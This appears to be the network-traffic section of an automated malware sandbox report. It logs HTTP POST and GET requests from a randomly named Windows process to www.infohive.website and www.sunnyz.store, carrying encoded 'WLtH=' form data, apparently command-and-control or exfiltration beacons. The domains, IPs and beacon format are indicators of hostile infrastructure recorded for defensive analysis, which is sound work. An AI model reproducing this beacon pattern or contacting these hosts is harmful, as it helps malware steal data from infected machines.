                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.104998666.29.149.46806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:14.136616945 CET1888OUTPOST /cnve/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.infohive.website
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.infohive.website
                                                          Referer: http://www.infohive.website/cnve/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 72 37 6e 49 41 52 52 77 6c 53 56 66 65 4e 4b 52 68 51 48 48 48 2b 61 66 38 52 6f 6e 58 61 4a 73 35 61 31 76 68 57 56 61 56 50 64 33 77 76 52 31 61 56 31 74 50 35 64 61 59 35 4a 52 46 4a 74 72 74 56 50 67 42 56 6a 33 65 73 6a 39 46 73 55 75 58 49 78 62 32 2b 69 6b 54 35 54 66 54 34 31 62 38 71 4f 46 33 68 57 4f 4f 70 50 51 56 57 51 4b 66 50 4f 55 47 47 50 4a 65 44 74 75 52 43 6f 6e 66 54 7a 4d 45 49 33 36 77 4b 64 39 52 30 4c 69 4b 68 55 6f 68 35 6e 54 35 48 73 4a 5a 71 77 48 64 76 34 76 65 4a 78 70 32 37 79 76 32 42 42 6e 41 5a 73 62 73 41 48 4a 66 61 51 58 4d 45 4f 57 6f 50 69 55 62 77 6e 74 37 78 4e 63 36 38 75 45 76 4c 43 77 4a 75 6d 75 38 32 68 67 6f 38 7a 46 72 73 46 42 42 55 33 79 41 66 78 53 33 52 54 58 4e 71 66 47 6e 72 69 72 76 4d 32 66 46 56 6b 4c 32 77 57 53 49 61 55 31 73 35 69 6a 43 75 2f 37 30 4f 32 53 4f 62 50 39 30 62 78 45 68 76 30 6f 2b 61 43 [TRUNCATED]
                                                          Data Ascii: WLtH=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQr7nIARRwlSVfeNKRhQHHH+af8RonXaJs5a1vhWVaVPd3wvR1aV1tP5daY5JRFJtrtVPgBVj3esj9FsUuXIxb2+ikT5TfT41b8qOF3hWOOpPQVWQKfPOUGGPJeDtuRConfTzMEI36wKd9R0LiKhUoh5nT5HsJZqwHdv4veJxp27yv2BBnAZsbsAHJfaQXMEOWoPiUbwnt7xNc68uEvLCwJumu82hgo8zFrsFBBU3yAfxS3RTXNqfGnrirvM2fFVkL2wWSIaU1s5ijCu/70O2SObP90bxEhv0o+aCp0pyGmNdGpXLiPxk8nL75le1zERkXo0GYtYutfAdo3UQV1zc0BMULKAhk8rvw7itbMQUxTLHDQ+kXWajo4V2RJHSlUvCpMIX/hfoS+VFZ600qoU0chqWrmtNNl2J6QWeLwrPSPJ7S73e/hGVcaGuqkfmNul3vW0QVhC/p9u2saffzJMUn1rb+F//aTo35z0NmDhkyHb/HJ/mI7bki8u1sw7UPJBw4r7qdrgfMXEKFJnxHTweHUG2fsifXFudCAF/tqvqGGSA/zwCmkVgj+MqvyqLXNhM8nCuysXFyaHXUsDzokPC68jjQDT5E66eNEn5zI/cZVugnfu7tQFBG/Vny1y3fo2Ivk/MzSxFSf5BXKsRSr6/X6kawM10WuXmtJDrMGv8WMcOtFAozm2ome0tOZmJVhLlE6jUPQX9h0LseXk2zfudyzkKXyQR2YmFRYHYTuljsl2eu1qN4HpdpmEZEdr6k40MRpcxkNrbu039V1ztGMYaXTvxuQ4BRNjcgeY7Pj1lFNV+SKrp4qn+6Zp20AWbXKvnk5Vj1u76kk4asJT+EVLGndgVJLTtAgnzlkqYWL+HHeOkDfI6yuKD/yumgISVYGcefTjAHV3moJ9eg/+gcsMDR56TuWfxFcAUASbcPMevy9rXFJTcEaPa1jYHf1Jv2j3YYRnzBF [TRUNCATED]
                                                          Jan 11, 2025 03:33:14.741681099 CET637INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:33:14 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.104998766.29.149.46806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:16.679600954 CET585OUTGET /cnve/?WLtH=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVbx8sa0WS/cLCNqs3fCZ4mL4UPzN89Q==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.infohive.website
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:33:17.274293900 CET652INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:33:17 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.1049988217.70.184.50806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:22.380213022 CET839OUTPOST /ead0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sunnyz.store
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sunnyz.store
                                                          Referer: http://www.sunnyz.store/ead0/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 48 6d 61 55 71 57 6f 30 34 54 78 55 45 43 33 78 4a 36 45 6b 77 79 34 74 6a 79 43 73 48 4d 71 76 4c 41 6b 57 34 47 56 6c 2f 50 76 65 36 2b 57 38 75 55 51 48 36 47 6c 66 7a 42 36 31 39 39 41 58 63 36 69 67 78 53 2f 76 6b 38 6d 75 74 5a 55 6c 55 54 4b 68 67 58 42 35 4e 42 53 78 33 59 35 2f 6f 51 47 34 70 73 2f 46 37 57 51 75 72 34 4a 47 72 70 49 47 37 67 66 57 55 78 4a 34 4d 65 78 49 65 43 52 32 64 4f 47 4d 2f 2f 51 67 43 6e 65 56 63 6c 30 6e 79 58 48 62 30 41 50 68 45 39 4c 69 4d 67 73 6a 62 49 38 77 59 47 54 73 71 6b 48 67
                                                          Data Ascii: WLtH=DyPyhmSylgtmHmaUqWo04TxUEC3xJ6Ekwy4tjyCsHMqvLAkW4GVl/Pve6+W8uUQH6GlfzB6199AXc6igxS/vk8mutZUlUTKhgXB5NBSx3Y5/oQG4ps/F7WQur4JGrpIG7gfWUxJ4MexIeCR2dOGM//QgCneVcl0nyXHb0APhE9LiMgsjbI8wYGTsqkHg
                                                          Jan 11, 2025 03:33:22.966058016 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 02:33:22 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.1049989217.70.184.50806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:24.934149027 CET863OUTPOST /ead0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sunnyz.store
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sunnyz.store
                                                          Referer: http://www.sunnyz.store/ead0/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 56 57 4b 55 73 31 51 30 76 6a 78 54 42 43 33 78 43 61 45 6f 77 79 30 74 6a 7a 58 7a 47 2b 65 76 4f 51 55 57 71 54 68 6c 78 76 76 65 31 65 57 6c 71 55 51 79 36 47 6f 67 7a 45 61 31 39 39 6b 58 63 36 53 67 77 6c 4c 6f 2b 4d 6d 73 6c 35 55 6e 61 7a 4b 68 67 58 42 35 4e 46 43 58 33 59 68 2f 70 68 32 34 34 39 2f 47 6b 6d 51 70 39 6f 4a 47 67 4a 49 64 37 67 66 67 55 77 56 57 4d 64 5a 49 65 41 35 32 64 38 75 4e 6b 50 51 71 63 58 66 47 53 31 56 35 39 30 58 62 37 43 72 49 59 37 61 48 50 42 52 6b 4b 5a 64 6e 4c 78 50 69 6b 69 79 4b 73 41 42 4a 66 74 68 77 38 75 56 6b 6f 68 67 65 2b 59 6d 57 4e 41 3d 3d
                                                          Data Ascii: WLtH=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+evOQUWqThlxvve1eWlqUQy6GogzEa199kXc6SgwlLo+Mmsl5UnazKhgXB5NFCX3Yh/ph2449/GkmQp9oJGgJId7gfgUwVWMdZIeA52d8uNkPQqcXfGS1V590Xb7CrIY7aHPBRkKZdnLxPikiyKsABJfthw8uVkohge+YmWNA==
                                                          Jan 11, 2025 03:33:25.551336050 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 02:33:25 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.1049990217.70.184.50806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:27.485584974 CET1876OUTPOST /ead0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sunnyz.store
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sunnyz.store
                                                          Referer: http://www.sunnyz.store/ead0/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 56 57 4b 55 73 31 51 30 76 6a 78 54 42 43 33 78 43 61 45 6f 77 79 30 74 6a 7a 58 7a 47 2b 47 76 53 79 63 57 34 67 35 6c 79 76 76 65 72 4f 57 34 71 55 51 56 36 47 41 6b 7a 45 48 43 39 2f 73 58 61 62 79 67 6c 6b 4c 6f 72 63 6d 73 70 5a 55 71 55 54 4b 77 67 58 52 39 4e 42 6d 58 33 59 68 2f 70 69 75 34 6f 63 2f 47 2f 6d 51 75 72 34 4a 61 72 70 4a 79 37 67 58 65 55 77 68 6f 4d 73 35 49 66 67 70 32 4f 66 47 4e 6f 50 51 6b 64 58 65 42 53 31 5a 59 39 30 36 67 37 47 6a 75 59 38 75 48 5a 6d 73 34 59 36 64 47 51 52 75 2b 74 30 53 50 2f 33 42 37 5a 4d 30 35 32 4f 4e 41 7a 43 74 42 2f 62 33 6c 61 34 79 5a 38 44 45 6e 45 46 46 4b 53 41 69 52 41 31 34 47 42 51 7a 4c 6b 6b 56 33 6d 58 6f 47 64 33 34 34 4b 70 6a 53 44 47 73 75 67 4a 52 4d 73 74 37 48 4d 70 7a 58 32 74 54 58 6e 53 39 62 70 67 45 4b 62 35 31 53 2b 30 31 73 79 68 51 43 47 33 64 50 50 65 6a 4e 4b 67 4a 31 59 62 4a 56 51 69 5a 66 53 43 6f 2f 6c 6d 43 47 62 5a 6d 30 31 67 51 32 30 4e 6d 62 61 68 52 67 41 [TRUNCATED]
                                                          Data Ascii: WLtH=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+GvSycW4g5lyvverOW4qUQV6GAkzEHC9/sXabyglkLorcmspZUqUTKwgXR9NBmX3Yh/piu4oc/G/mQur4JarpJy7gXeUwhoMs5Ifgp2OfGNoPQkdXeBS1ZY906g7GjuY8uHZms4Y6dGQRu+t0SP/3B7ZM052ONAzCtB/b3la4yZ8DEnEFFKSAiRA14GBQzLkkV3mXoGd344KpjSDGsugJRMst7HMpzX2tTXnS9bpgEKb51S+01syhQCG3dPPejNKgJ1YbJVQiZfSCo/lmCGbZm01gQ20NmbahRgAutxkWAiWl1izBn4r0mPaxZQAEpjLCqp4vXhVs+cDKYOU0sRW4wMzkh8y9aKOKLfNjlIPVsyk/ES0rlXkCNFtCjYsPaExSUncdOF8z04xQyoFKR0lmqg9wzTBFErrqAJc3yBGjDguRKl2ZJKAZ5qJjbPxrvjMfI9dKtIhVjSoK/1y5h1KFUnwNxhCqxU2TpvW9Wcm4gcHpY5k32P+mAtxPPAH6cZwWzjMAXcCXVukPDpgyX8hkgS81GkikFJZgchFam6FlGz9+qKYWVDnR3ObXo257qKa5tFGOFzRLI978MnS81AWSl69XRcah1lYPBmbldf1f7+ak3PCDcPTaq/BIEeRQtYtI55IqpQAc77as5dTRcC1LQ9yvRHSAFLMMA30xKpA53zXOuqreFdpi6aRD5hIpkZWVfzSkdy7szVmOS2miBZtsJ48XrEVCh8uSN5NSNg2eKs+w2GrRXwCDmV0bASwjlqrvz61HuUPx4kNuVS0JSdj/fX8l2dk0u5mdhbUivDaXLuHO0HmfXCxP9nI19Sq4QBdIfzEAOWd+rNjpeCAjPLobIMA7L8LAQ7CiadCrznjAxeBlN1bGWMoVuRdBBlWpg26qj8IymIe4IsWF6JT3ygLz0xB9po0HhEmr2z2AhHYiC2pZhxhvjQPONGU3G3oxn4dBfsZfV [TRUNCATED]
                                                          Jan 11, 2025 03:33:28.071480989 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 02:33:27 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.1049991217.70.184.50806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:30.021702051 CET581OUTGET /ead0/?WLtH=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhs+/iOoUSS+snV9WWhaA8IUFph6/7A==&W0-=CzJDBfQxOTFPL HTTP/1.1
